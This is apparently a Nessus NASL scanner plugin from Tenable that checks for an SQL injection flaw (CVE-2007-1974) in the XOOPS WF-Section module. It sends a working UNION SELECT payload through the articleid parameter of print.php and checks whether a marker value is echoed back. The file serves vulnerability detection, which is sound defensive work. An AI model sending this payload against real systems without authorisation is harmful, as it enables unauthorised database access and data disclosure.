#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(24908);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-1974");
  script_bugtraq_id(23259);

  script_name(english:"XOOPS WF-Section Module articleid Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to manipulate main text with WF-Section module");

  desc = "
Synopsis :

The remote web server contains a PHP application that is prone to a
SQL injection attack. 

Description :

The remote host is running the WF-Section module, a third-party module
for Xoops. 

The version of this module installed on the remote host fails to
properly sanitize user-supplied input to the 'articleid' parameter of
the 'modules/wfsection/print.php' script before using it to build a
database query.  Regardless of PHP's 'magic_quotes_gpc' setting, an
unauthenticated remote attacker can leverage this issue to launch SQL
injection attacks against the affected application, leading to
discovery of sensitive information, attacks against the underlying
database, and the like. 

See also :

http://milw0rm.com/exploits/3644
http://www.xoops.org/modules/news/article.php?storyid=3717

Solution :

Upgrade to WF-Section version 1.02 or later.

Risk factor :

High / CVSS Base Score : 7.0
(AV:R/AC:L/Au:NR/C:P/I:P/A:P/B:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("xoops_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/xoops"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # Try to exploit the flaw to manipulate the main text.
  magic = unixtime();
  exploit = string("9999999 UNION SELECT 1111,2222,3333,4444,", magic, ",6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*");

  req = http_get(
    item:string(
      dir, "/modules/wfsection/print.php?",
      "articleid=", urlencode(str:exploit)
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we managed to set the description based on our magic.
  if (
    "modules/wfsection/images/logo.gif" >< res &&
    string("<tr><td>", magic, "<br /><br /><br /><hr /><br />") >< res
  )
  {
    security_hole(port);
    exit(0);
  }
}
